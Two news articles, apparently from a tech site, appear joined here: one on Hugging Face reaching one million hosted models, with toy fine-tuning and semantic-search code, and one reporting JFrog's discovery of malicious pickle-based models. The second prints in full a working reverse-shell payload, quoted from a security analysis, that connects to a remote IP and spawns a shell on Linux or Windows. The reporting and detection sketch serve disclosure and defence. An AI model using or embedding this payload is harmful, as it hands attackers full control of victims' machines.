Hugging Face

Exponential growth brews 1 million AI models on Hugging Face

The sand has come alive —

Hugging Face cites community-driven customization as fuel for diverse AI model boom.

The Hugging Face logo in front of shipping containers.

On Thursday, AI hosting platform Hugging Face surpassed 1 million AI model listings for the first time, marking a milestone in the rapidly expanding field of machine learning. An AI model is a computer program (often using a neural network) trained on data to perform specific tasks or make predictions. The platform, which started as a chatbot app in 2016 before pivoting to become an open source hub for AI models in 2020, now hosts a wide array of tools for developers and researchers.

The machine-learning field represents a far bigger world than just large language models (LLMs) like the kind that power ChatGPT. In a post on X, Hugging Face CEO Clément Delangue wrote about how his company hosts many high-profile AI models, like “Llama, Gemma, Phi, Flux, Mistral, Starcoder, Qwen, Stable diffusion, Grok, Whisper, Olmo, Command, Zephyr, OpenELM, Jamba, Yi,” but also “999,984 others.”

The reason, Delangue says, is customization. “Contrary to the ‘1 model to rule them all’ fallacy,” he wrote, “smaller specialized customized optimized models for your use-case, your domain, your language, your hardware and generally your constraints are better. As a matter of fact, something that few people realize is that there are almost as many models on Hugging Face that are private only to one organization—for companies to build AI privately, specifically for their use-cases.”

A Hugging Face-supplied chart showing the number of AI models added to Hugging Face over time, month to month.

Hugging Face’s transformation into a major AI platform follows the accelerating pace of AI research and development across the tech industry. In just a few years, the number of models hosted on the site has grown dramatically along with interest in the field. On X, Hugging Face product engineer Caleb Fahlgren posted a chart of models created each month on the platform (and a link to other charts), saying, “Models are going exponential month over month and September isn’t even over yet.”

The power of fine-tuning

As Delangue hinted above, the sheer number of models stems from the platform's collaborative nature and the practice of fine-tuning existing models for specific tasks. Fine-tuning means taking an existing model and giving it additional training to add new concepts to its neural network and alter how it produces outputs. Developers and researchers from around the world contribute their results, leading to a large ecosystem.
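To make the idea of fine-tuning concrete, here is a deliberately tiny sketch in plain Python. It is not how real neural networks on Hugging Face are trained. It assumes a hypothetical one-variable linear "model" with made-up starting weights and a made-up task dataset, and it only shows the core idea: training resumes from existing weights rather than starting from scratch.

```python
# Toy illustration of fine-tuning: start from "pretrained" weights and
# continue gradient descent on a small task-specific dataset.
# Every number below is invented for illustration.

def predict(w, b, x):
    return w * x + b

def mse(w, b, data):
    """Mean squared error of the linear model on (x, y) pairs."""
    return sum((predict(w, b, x) - y) ** 2 for x, y in data) / len(data)

def fine_tune(w, b, data, lr=0.05, steps=500):
    """Run plain gradient descent, starting from the given weights."""
    n = len(data)
    for _ in range(steps):
        grad_w = sum(2 * (predict(w, b, x) - y) * x for x, y in data) / n
        grad_b = sum(2 * (predict(w, b, x) - y) for x, y in data) / n
        w -= lr * grad_w
        b -= lr * grad_b
    return w, b

# Hypothetical "base model": weights assumed to come from earlier training.
base_w, base_b = 2.0, 0.0

# Hypothetical new task whose data follows y = 2.5x + 1.
task_data = [(0.0, 1.0), (1.0, 3.5), (2.0, 6.0), (3.0, 8.5)]

loss_before = mse(base_w, base_b, task_data)
tuned_w, tuned_b = fine_tune(base_w, base_b, task_data)
loss_after = mse(tuned_w, tuned_b, task_data)
```

After the extra training steps, the adjusted weights fit the new task's data more closely than the base weights did, which is the effect fine-tuning aims for at a much larger scale.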

For example, the platform hosts many variations of Meta’s open-weights Llama models that represent different fine-tuned versions of the original base models, each optimized for specific applications.

Hugging Face’s repository includes models for a wide range of tasks. Browsing its models page shows categories such as image-to-text, visual question answering, and document question answering under the “Multimodal” section. In the “Computer Vision” category, there are sub-categories for depth estimation, object detection, and image generation, among others. Natural language processing tasks like text classification and question answering are also represented, along with audio, tabular, and reinforcement learning (RL) models.

A screenshot of the Hugging Face models page captured on September 26, 2024.

When sorted for “most downloads,” the Hugging Face models list reveals trends about which AI models people find most useful. At the top, with a massive lead at 163 million downloads, is Audio Spectrogram Transformer from MIT, which classifies audio content like speech, music, and environmental sounds. Following that, with 54.2 million downloads, is BERT from Google, an AI language model that learns to understand English by predicting masked words and sentence relationships, enabling it to assist with various language tasks.

Rounding out the top five AI models are all-MiniLM-L6-v2 (which maps sentences and paragraphs to 384-dimensional dense vector representations, useful for semantic search), Vision Transformer (which processes images as sequences of patches to perform image classification), and OpenAI’s CLIP (which connects images and text, allowing it to classify or describe visual content using natural language).
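As a rough illustration of how sentence vectors support semantic search, the sketch below ranks a few sentences by cosine similarity to a query. The vectors are hand-written, four-dimensional stand-ins chosen for this example. A real embedding model such as all-MiniLM-L6-v2 would produce 384-dimensional vectors, and the sentences and the `search` helper here are hypothetical.

```python
import math

def cosine_similarity(a, b):
    """Cosine of the angle between two equal-length vectors."""
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(y * y for y in b))
    return dot / (norm_a * norm_b)

# Hypothetical embeddings, invented for illustration only.
corpus = {
    "How do I reset my password?": [0.9, 0.1, 0.0, 0.2],
    "Best hiking trails near Denver": [0.0, 0.8, 0.6, 0.1],
    "Steps to recover a locked account": [0.8, 0.2, 0.1, 0.3],
}

# Stands in for the embedding of a query about account access.
query_vector = [0.85, 0.15, 0.05, 0.25]

def search(query_vec, documents):
    """Return (score, text) pairs sorted from most to least similar."""
    scored = [(cosine_similarity(query_vec, vec), text)
              for text, vec in documents.items()]
    return sorted(scored, reverse=True)

ranked = search(query_vector, corpus)
```

With these made-up vectors, the two account-related sentences score far higher than the hiking sentence, even though they share few words with each other.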

No matter what the model or the task, the platform just keeps growing. “Today a new repository (model, dataset or space) is created every 10 seconds on HF,” wrote Delangue. “Ultimately, there’s going to be as many models as code repositories and we’ll be here for it!”

Hugging Face, the GitHub of AI, hosted code that backdoored user devices

IN A PICKLE —

Malicious submissions have been a fact of life for code repositories. AI is no different.

Code uploaded to AI developer platform Hugging Face covertly installed backdoors and other types of malware on end-user machines, researchers from security firm JFrog said Thursday in a report that’s a likely harbinger of what’s to come.

In all, JFrog researchers said, they found roughly 100 submissions that performed hidden and unwanted actions when they were downloaded and loaded onto an end-user device. Most of the flagged machine learning models—all of which went undetected by Hugging Face—appeared to be benign proofs of concept uploaded by researchers or curious users. JFrog researchers said in an email that 10 of them were “truly malicious” in that they performed actions that actually compromised the users’ security when loaded.

Full control of user devices

One model drew particular concern because it opened a reverse shell that gave a remote device on the Internet full control of the end user’s device. When JFrog researchers loaded the model into a lab machine, the submission indeed loaded a reverse shell but took no further action.

That inaction, the IP address of the remote device, and the existence of identical shells connecting elsewhere raised the possibility that the submission was also the work of researchers. An exploit that opens a device to such tampering, however, is a major breach of researcher ethics and demonstrates that, just like code submitted to GitHub and other developer platforms, models available on AI sites can pose serious risks if not carefully vetted first.

“The model’s payload grants the attacker a shell on the compromised machine, enabling them to gain full control over victims’ machines through what is commonly referred to as a ‘backdoor,’” JFrog Senior Researcher David Cohen wrote. “This silent infiltration could potentially grant access to critical internal systems and pave the way for large-scale data breaches or even corporate espionage, impacting not just individual users but potentially entire organizations across the globe, all while leaving victims utterly unaware of their compromised state.”

A lab machine set up as a honeypot to observe what happened when the model was loaded.

Secrets and other bait data the honeypot used to attract the threat actor.

How baller423 did it

Like the other nine truly malicious models, the one discussed here used pickle, a format that has long been recognized as inherently risky. Pickle is commonly used in Python to convert objects and classes in human-readable code into a byte stream so that they can be saved to disk or shared over a network. This process, known as serialization, gives hackers the opportunity to sneak malicious code into the flow.
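For readers unfamiliar with the format, this minimal sketch shows an ordinary pickle round trip using Python's standard library. The `settings` dictionary is a made-up example and has nothing to do with the flagged models.

```python
import pickle

# A made-up object to serialize.
settings = {"model": "demo", "layers": [64, 32], "dropout": 0.1}

# Serialization: Python object -> byte stream.
blob = pickle.dumps(settings)

# Deserialization: byte stream -> a new, equal Python object.
# Only do this with data from a source you trust.
restored = pickle.loads(blob)
```

The bytes in `blob` could just as easily be written to a file or sent over a network, which is how pickled model files end up being shared.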

The model that spawned the reverse shell, submitted by a party with the username baller423, was able to evade Hugging Face’s malware scanner by using pickle’s “__reduce__” method to execute arbitrary code after loading the model file.
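The mechanism is easy to see with a harmless stand-in. In the sketch below, a hypothetical class named `Demo` defines `__reduce__` so that unpickling calls the built-in `sorted` function instead of rebuilding a `Demo` object. Nothing here comes from the flagged model. It only shows that whoever creates a pickle chooses which callable runs when someone else loads it.

```python
import pickle

class Demo:
    def __reduce__(self):
        # Tells pickle: "to rebuild this object, call sorted([3, 1, 2])".
        # An attacker would name a dangerous callable here instead.
        return (sorted, ([3, 1, 2],))

blob = pickle.dumps(Demo())

# Loading the bytes calls sorted(...) and returns its result.
# No Demo instance is ever reconstructed.
result = pickle.loads(blob)
```

Because the call happens inside `pickle.loads`, the person loading the file never has to invoke anything explicitly for the embedded instruction to run.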

JFrog’s Cohen explained the process in much more technically detailed language:

In loading PyTorch models with transformers, a common approach involves utilizing the torch.load() function, which deserializes the model from a file. Particularly when dealing with PyTorch models trained with Hugging Face’s Transformers library, this method is often employed to load the model along with its architecture, weights, and any associated configurations. Transformers provide a comprehensive framework for natural language processing tasks, facilitating the creation and deployment of sophisticated models. In the context of the repository “baller423/goober2,” it appears that the malicious payload was injected into the PyTorch model file using the __reduce__ method of the pickle module. This method, as demonstrated in the provided reference, enables attackers to insert arbitrary Python code into the deserialization process, potentially leading to malicious behavior when the model is loaded.

Upon analysis of the PyTorch file using the fickling tool, we successfully extracted the following payload:

RHOST = "210.117.212.93"
RPORT = 4242

from sys import platform

if platform != 'win32':
    import threading
    import socket
    import pty
    import os

    def connect_and_spawn_shell():
        s = socket.socket()
        s.connect((RHOST, RPORT))
        [os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
        pty.spawn("/bin/sh")

    threading.Thread(target=connect_and_spawn_shell).start()
else:
    import os
    import socket
    import subprocess
    import threading
    import sys

    def send_to_process(s, p):
        while True:
            p.stdin.write(s.recv(1024).decode())
            p.stdin.flush()

    def receive_from_process(s, p):
        while True:
            s.send(p.stdout.read(1).encode())

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    while True:
        try:
            s.connect((RHOST, RPORT))
            break
        except:
            pass

    p = subprocess.Popen(["powershell.exe"],
                         stdout=subprocess.PIPE,
                         stderr=subprocess.STDOUT,
                         stdin=subprocess.PIPE,
                         shell=True,
                         text=True)

    threading.Thread(target=send_to_process, args=[s, p], daemon=True).start()
    threading.Thread(target=receive_from_process, args=[s, p], daemon=True).start()
    p.wait()
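A pickle can be inspected without being loaded. The sketch below is a simplified approximation of that kind of static check, not a reproduction of how fickling or Hugging Face's scanner works. It uses the standard library's `pickletools.genops` to list opcodes without executing them and flags the ones that import or call objects. The opcode set, the helper name `find_suspicious_opcodes`, and the `CallsOnLoad` class are assumptions made for this example. Real PyTorch files also wrap their pickle data in an archive, which this sketch does not handle.

```python
import pickle
import pickletools

# Opcodes that import names or call objects during unpickling.
# This list is an assumption for the sketch, not a complete policy.
SUSPICIOUS_OPCODES = {
    "GLOBAL", "STACK_GLOBAL", "REDUCE",
    "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX",
}

def find_suspicious_opcodes(blob):
    """List flagged opcode names found in a pickle, without loading it."""
    found = []
    for opcode, _arg, _pos in pickletools.genops(blob):
        if opcode.name in SUSPICIOUS_OPCODES:
            found.append(opcode.name)
    return found

class CallsOnLoad:
    # Harmless stand-in for a crafted object: unpickling calls sorted().
    def __reduce__(self):
        return (sorted, ([3, 1, 2],))

plain = pickle.dumps({"weights": [0.1, 0.2]})
crafted = pickle.dumps(CallsOnLoad())

plain_hits = find_suspicious_opcodes(plain)      # plain data only
crafted_hits = find_suspicious_opcodes(crafted)  # contains a call
```

A check like this produces false positives, since many legitimate pickles also import classes, so it is better treated as a prompt for closer review than as a verdict.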

Hugging Face has since removed the model and the others flagged by JFrog.
